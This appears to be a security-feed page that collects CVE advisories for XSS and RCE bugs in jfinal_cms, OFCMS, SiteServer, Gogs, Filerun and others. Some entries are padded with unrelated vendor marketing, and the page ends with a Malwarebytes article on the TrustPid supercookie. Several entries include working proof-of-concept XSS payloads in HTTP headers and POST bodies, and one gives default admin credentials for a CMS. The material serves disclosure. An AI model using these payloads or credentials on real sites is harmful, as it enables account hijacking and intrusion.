A cross-site scripting (XSS) vulnerability in Jfinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted X-Forwarded-For request.

There is a storage XSS vulnerability in the guest TOP10 of jfinal\_cms. TOP10 will display the ip of the user, but it can be modified by X-Forwarded-For, where the attacker can insert malicious XSS code. When the administrator logs in, the malicious XSS code triggers successfully.

payload: X-Forwarded-For: 192.168.1.1<script>alert ("xss")</script>

In the background login interface, enter the account password randomly, fill in the correct verification code, and then submit and grab the package.  

The contents of the grab bag are as follows:  

Add an X-Forwarded-For here and enter paylaod (192.168.1.1<script>alert ("xss")</script>)  

Then log in with the background administrator account to trigger the storage XSS.  

Safety advice:  
Strictly filter the user's input  
Strict control of page rendering content

CVE-2022-29648: There is an xss vulnerability of HTTP header injection storage in jfinal_cms V5.1.0 · Issue #34 · jflyfox/jfinal_cms

OFCMS v1.1.4 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/comn/service/update.json.

\[Suggested description\]  
There are many cross-site scripting vulnerabilities in the background of OFCMS system version 1.1.4, because the special characters entered are not effectively escaped.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

    POST /ofcms/admin/comn/service/update.json?sqlid=system.role.update HTTP/1.1
    Host: localhost:7000
    Content-Length: 94
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://localhost:7000
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:7000/ofcms/admin/f.html?p=system/role/edit.html&role_id=3&_fsUuid=820e45c9-7f52-4e8d-b917-930c4b13153c
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=A81B589572EF210191B7C30F017A814D
    Connection: close
    
    role_id=3&role_name=%24%7B2*2%7D&role_desc=Test+freemarker+%3Cscript%3Ealert(1)%3C%2Fscript%3E
    

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability to prove\]  
Case 1:  
/ofcms/admin/comn/service/update.json?sqlid=system.menu.update  
  
  

Case 2:  
/ofcms/admin/comn/service/update.json?sqlid=cms.bbs.update  
  
  

Case 3:  
/ofcms/admin/comn/service/update.json?sqlid=cms.ad.update

CVE-2022-29653: There are many cross-site scripting vulnerabilities in ofCMS system background · Issue #I53COA · 欧福/ofcms - Gitee.com

LibreNMS v22.3.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /Table/GraylogController.php.

Reported by  
● Darek Jensen  
● haxmeadroom

**Please note**

> Please read this information carefully. You can run ./lnms dev:check to check your code before submitting.

*   Have you followed our code guidelines?
*   If my Pull Request does some changes/fixes/enhancements in the WebUI, I have inserted a screenshot of it.
*   If my Pull Request makes discovery/polling/yaml changes, I have added/updated test data.

**Testers**

If you would like to test this pull request then please run: ./scripts/github-apply <pr_id>, i.e ./scripts/github-apply 5926  
After you are done testing, you can remove the changes with ./scripts/github-remove. If there are schema changes, you can ask on discord how to revert.

CVE-2022-29711: Fix Graylog XSS by murrant · Pull Request #13931 · librenms/librenms

A cross-site scripting (XSS) vulnerability in ICT Protege GX/WX v2.08 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter.

**Unified Access Control and Intrusion Solutions**

Whether you’re a small business needing a scalable solution or a large corporate enterprise project with thousands of doors and complex user requirements, a Protege system provides a comprehensive and flexible solution that meets the evolving needs of today's users.

**For small to medium businesses**

With no software to install, Protege WX is simple to deploy while the web-based interface means you can configure, control, and monitor your system from anywhere.

Learn more about Protege WX

**For large, enterprise organizations**

With a feature set that is easy to operate, simple to integrate, and effortless to extend, Protege GX offers a comprehensive solution that provides true benefits to any organization.

Learn more about Protege GX

**Trusted by Global Brands**

With thousands of systems installed for customers worldwide, we protect people, property, and information across a wide range of verticals.

**Where to from here?**

Our team is always here to help. Whether it's questions on installing software, advice on how to wire a card reader, or information on buying ICT products, we'd be happy to hear from you.

CVE-2022-29734: ICT | Unified access control and intruder detection

siteserver SSCMS 6.15.51 is vulnerable to Cross Site Scripting (XSS).

测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-v6.15.51/siteserver\_install.zip  
SiteServer: V6.15.51  
测试环境：windows 2012 R2  
数据库 sql server 2016  
  
(需要登录测试)  
漏洞url:/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  

包体  
\`POST /SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1 HTTP/1.1  
Host: 192.168.39.3:8055  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 304  
Origin: http://192.168.39.3:8055  
Connection: close  
Referer: http://192.168.39.3:8055/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  
Cookie: BAIRONG.VC.ADMINLOGIN=oeLExOp9UBM0equals0; ss\_administrator\_access\_token=M3ENIa3NKJJ39JCRHnY4PgfJqMC7lFjggL0e9S06Bs9ubZE90add0xM2aesaL0add0Cxo8Xe5VZrSanerzFU8oZaMXCC9KMxdw29fLk6uNSSoY4Pa0add0BOZfzRwKT2t3LglumO4sTUKSz0slash0ubJ9QajCyTsKpmbPu7yv20add08zpsQyVPpl3TuMITkOCIX1EwcC7CeIJ50slash0XQ9d0slash0oR8ECV0add0690add0eXRHbEImnZsLBsrhv7KML0Jhuevbhvcjs0equals0; ASP.NET\_SessionId=l3tothqgmzbgljaogh1uof3y; SS-ADMIN-TOKEN=z69iWbk6QAgWtUmPiJBXDd7vXmikE7IMRbVWfh0add00xyMUHXn13zDSbfJyodBLcAQuP9kU0slash0F7SybZwZUK7ER9csWj0ODr7NgSqXfVWABfJpKMXGuT2wQudsXkhDU9JMvsrkNIPV5cKDS3vGUQNyPwFtxt7YFaPv4h0slash09w0slash0UOjfXLezfaa1ML5HzkaV5p1JCQWmJTQEnr7CYs7SWD7Jqq2Ifc0slash0oUvADaZFl2TmYxcUUCqEQ0equals00secret0  
Upgrade-Insecure-Requests: 1

\_\_EVENTTARGET=&\_\_EVENTARGUMENT=&\_\_VIEWSTATE=MVZqB4shzUeYHIX5zAuRZJJbL8r72A7Evx94mUbTTNpGbOwWBZkeb79FVsI2zTj0PlNYIzK%2BpEzx3SRf96HflbXA8nFVIpCU16GBIeWZSq4vLCZLjX0CoHWGwnxNyQzo&\_\_VIEWSTATEGENERATOR=4DCED64B&TbItemName=%3Csvg+onload%3Dalert%28document.domain%29%3E&TbItemValue=2222&ctl04=%E7%A1%AE+%E5%AE%9A\`

CVE-2022-30349: 跨站脚本攻击(xss) · Issue #3238 · siteserver/cms

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

CVE-2022-30470: FileRun - Selfhosted File Manager with Sharing and Backup for Photos, Docs & More

Authenticated (author or higher role) Stored Cross-Site Scripting (XSS) vulnerability in Fatcat Apps Easy Pricing Tables plugin <= 3.1.2 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

*   The **Easy Pricing Tables** WordPress Plugin makes it easy to create and publish beautiful pricing tables and comparison tables on your WordPress site. You can build, customize and publish a pricing table in just a few minutes, straight from the post editor, with zero coding required.

View screenshots of WordPress pricing tables built with this plugin.

View Easy Pricing Tables Premium Live Demo »

> **Gutenberg Compatible**
> 
> This plugin is fully compatible with WordPress 5.0’s new block editor (“Gutenberg”). You can build and edit pricing tables directly in the post editor. Also features support for classic editor and page builders.
> 
> **Easy Pricing Tables Premium**
> 
> Easy Pricing Tables Premium comes with the following features.
> 
> Six Gorgeous Pricing Table Designs.  
> Comparison Tables.  
> Fully Customize your Pricing Table (Colors, etc…).  
> Choose From 15 Font Options.  
> Add Inline Images to Pricing Tables.  
> One-Click WooCommerce Integration.  
> Priority Email Support.  
> Pricing Toggles (switch between multiple pricing tables – eg. currencies or monthly/yearly pricing.  
> And much more….
> 
> Learn more about Easy Pricing Tables Premium >>

**Overview**

Easy Pricing Tables is the first WordPress pricing table plugin built specifically for the block editor.

Building pricing tables on your site has never been easier. Simply add the pricing table block to your post, fill in your prices and features, and publish.

No coding required. Easy Pricing Tables lets anyone create a responsive pricing table in just a few minutes.

**Easy Pricing Tables – WordPress Pricing Table Plugin Features**

*   Build beautiful WordPress pricing tables in minutes.
    
*   Works with any WordPress theme.
    
*   Responsive WordPress Pricing Tables – responds to fit any device.
    
*   Easy Pricing Tables implements conversion rate optimization (CRO) best practices and guides you through the process of creating a pricing table that converts.
    
*   Easy Pricing Tables works with any WordPress theme you have installed. Use the pricing table block to build pricing tables in the post editor, or build in the plugin dashboard and add to your page via shortcode.
    
*   Gutenberg / WordPress 5.0 compatible. Not just compatible. Easy Pricing Tables is built specifically for the block editor.
    
*   Intuitive User Interface – building pricing tables has never been easier. Point and click to edit your table.
    
*   Create unlimited pricing table rows.
    
*   Customize your pricing table design with color pickers, font pickers and native design settings.
    
*   Reorder pricing table columns with one click.
    
*   Featured Column – draw people to your most popular products by highlighting a featured column.
    
*   Save pricing tables as reusable blocks to add in multiple posts or pages.
    
*   Shortcode support for use with classic editor and page builders.
    
*   Add PayPal payment links, Stripe payment links, or any other checkout link to your pricing table buttons.
    
*   Automatically match column heights to keep rows aligned.
    
*   Customize text size and formatting with one click.
    
*   Check out Easy Pricing Tables Premium
    

**WordPress.org Support**

> As this is the lite version of this WordPress pricing table plugin, the only support we offer through these forums is for bugs. Support for questions regarding modifying your pricing tables, writing custom CSS, etc is available for customers of Easy Pricing Tables Premium.

**Privacy Disclosure**

This plugin does not store any personal data.

Our full privacy policy is available here: https://fatcatapps.com/legal/privacy-policy/

This plugin provides 2 blocks.

*   Easy Pricing Table
*   Pricing Tables (Legacy)

1.  Upload the Easy Pricing Tables plugin file (easy-pricing-tables.zip) to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  In your sidebar, select ‘Pricing Tables -> Add New’ to create a new table

**Can I use Easy Pricing Tables with Elementor?**

Yes, Easy Pricing Tables is compatible with Elementor and any other page builder plugin that supports shortcodes.

To add a pricing table anywhere other than the block editor, go to the Easy Pricing Tables plugin dashboard, create your table, and add it to your post with the shortcode provided.

**How can I save pricing tables to publish in multiple parts of my site?**

Create your pricing table and save it as a reusable block. Choose this reusable block anywhere you wish to add your pricing table.

**How do I change the width of my pricing table?**

Your pricing tables will fit to the content area your theme allows. You can edit how wide or narrow it appears with the “change alignment” setting (in the settings toolbar above the block). Change the alignment settings to set how much of the content area your pricing table fits to (e.g. “wide width” or “full width”).

**How can I integrate Easy Pricing Tables with WooCommerce?**

Easy Pricing Tables premium comes with a one-click integration to add WooCommerce products to your pricing table. Check out Easy Pricing Tables Premium here.

Looks great, is fluid, and customisable. Perfect. Love it.

Easy to setup and works beatifully. Love that you can include logo images in table.

Been using this plugin for almost a year now, the legacy version, works perfect for my needs.

Well, the free plugin is complete waste of time.

Great plugin for creating pricing tables.

Read all 128 reviews

“Pricing Tables WordPress Plugin – Easy Pricing Tables” is open source software. The following people have contributed to this plugin.

Contributors

CVE-2021-36866: Pricing Tables WordPress Plugin – Easy Pricing Tables

Missing input validation in internal/db/repo_editor.go in Gogs before 0.12.8 allows an attacker to execute code remotely. An unprivileged attacker (registered user) can overwrite the Git configuration in his repository. This leads to Remote Command Execution, because that configuration can contain an option such as sshCommand, which is executed when a master branch is a remote branch (using an ssh:// URI). The remote branch can also be configured by editing the Git configuration file. One can create a new file in a new repository, using the GUI, with "\" as its name, and then rename this file to .git/config with the custom configuration content (and then save it).

CVE-2021-32546: Releases · gogs/gogs

Product Show Room Site version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/admin/?page=system_info/contact_info and click View button2. Put XSS payload  (`<script>alert(111)</script>`) in the Telephone box and click on Update to publish the page   ![image](https://user-images.githubusercontent.com/60683449/171591851-2068eea2-b789-464f-8afb-9f6b6f8eaedd.png)    3. Open http://172.24.5.107/psrs/?p=contact,Viewing the successfully published page,We can see the alert.   ![image](https://user-images.githubusercontent.com/60683449/171591881-2962a429-f2de-4979-8e27-6fdd8f62c61c.png)-------# Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/?p=contact 2. Put XSS payload  (`<script>alert(111)</script>`) in the Message box and click on Send Message to publish the page  ![image](https://user-images.githubusercontent.com/60683449/171591580-cc3ca01c-9e37-4e05-9351-4b9d7c7749df.png)  ![image](https://user-images.githubusercontent.com/60683449/171591599-be5e8d7f-1d95-43ad-875a-9884f7052fa6.png)   4. Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries  page,We can see the alert.  ![image](https://user-images.githubusercontent.com/60683449/171591660-c12ce9ac-aab1-45e9-b99f-7514dd28f698.png)

Product Show Room Site 1.0 Cross Site Scripting

German ISPs are working on the introduction of TrustPid. A supercookie that is intended to replace tracking cookies.
The post TrustPid is another worrying, imperfect attempt to replace tracking cookies appeared first on Malwarebytes Labs.

German ISPs are considering the introduction of TrustPid, a new type of “supercookie” that comprises of a unique identifier which will be issued for each customer that will be able to track what that customer is doing online.

The providers are trying to sell this idea by telling the public that the identifier can never be tracked back to an individual and that something needs to be done to keep the internet free.

**The end of the tracking cookie**

Where does this attempt come from, you may ask. Advertisers are seeing the end of the tracking cookie on the horizon and it’s coming closer.

Google has announced that it will stop the use of third-party cookies in Chrome by the end of 2023, joining a growing list of browsers that are saying farewell to the tracking cookies. And Apple already blocks default tracking everywhere.

Social media and tech giants, including Google, are already looking at other business models to replace tracking cookies since they are the ones that benefited the most from targeted advertising, by providing the most useful information to the advertisers.

What makes supercookies different is that they are unique identifiers that are inserted into the HTTP header by a service provider. Unlike normal cookies they do not get stored in browsers or browser plug-ins.

**Free internet**

The idea of a free internet—as communicated by some of these companies—is not that they are signing you up as a customer free of charge. Wouldn’t that be nice? No, the idea is that websites that are providing content need to make a living. And the usual income for most of those sites comes from advertising. Why the ISP providers feel that it is part of their job description to enable targeted advertising escapes me. But undoubtedly the goal is to improve the bottom line.

Targeted advertising is more rewarding than regular advertising since it supposedly enormously enhances the effect of the advertisement. At least, that’s the idea that most advertisers live by, and sell to their customers. But here’s something to consider: According to research by Cloudflare, 20 percent of websites that serve ads receive visits almost exclusively by fraudulent click bots, and that bots comprise roughly 50 percent of all Internet traffic. Imagine how much money advertisers could save by effectively tackling ad fraud. Plus, that sounds a lot better than tagging another tracker on us.

**Hiding consent**

The worst bit of your ISP enabling the tracking is that every user has to sign some sort of agreement with them. In this agreement the ISP can hide the TrustPid consent in a long End-user License Agreement (EULA) that almost no-one ever reads and which can probably not be declined partially. It’s all or nothing if you want or need this provider. And if one provider successfully monetizes this idea, I’m afraid others will quickly follow suite.

Another advantage of an ISP is that they know if and when the IP of your home connection changes and for mobile devices they can even enumerate the users within a household by identifying the individual devices.

**History**

The idea of ISPs issuing supercookies is certainly not new. Verizon was the example that should have served as a history lesson here. In 2016, Verizon had to settle with the FCC over its use of a supercookie, which tracked the websites visited by phones on its network. They were fined because they forgot to inform the customers or give them an opt-out option. Verizon had to pay a fine of $1.35 million and was ordered to receive customer permission before sharing tracking data with other companies or even within its own organization.

**How it works**

The network provider will first combine your mobile number and IP address to generate a pseudonymous network identifier, after which using that identifier they will generate a pseudonymous unique token (TrustPid).

This TrustPid is used to create additional marketing tokens for the websites of advertisers and publishers you visit (website specific tokens). Advertisers and publishers aren’t (shouldn’t be) able to identify you as a person via the website specific tokens.

Where you have given consent, advertisers and publishers will use the website specific tokens to provide you with targeted online marketing, or conduct analytics. The advertisers and publishers that you’ve consented to could be drawn up in a list that will be in the hands of the ISP, but you can manage your consent for those parties at any time via the Privacy Portal.

I inserted the “shouldn’t be” since we are all too aware that many good intentions have unexpected consequences. Let’s suppose that you fill out your details on one of the websites that you decided to trust. Introduce one XSS vulnerability and all your personal details could be linked back to your TrustPid.

**Mitigation**

Because of the lack of technical details provided about TrustPid, we are not completely clear how a user can avoid being tracked. But I asked German privacy expert Andreas Dewes and he responded:

> “a device level VPN with integrated DNS should be able to block this kind of tracking.”

Once we know more, there might be easier and simpler ways to get around this. We’ll keep you posted.

Tag

#xss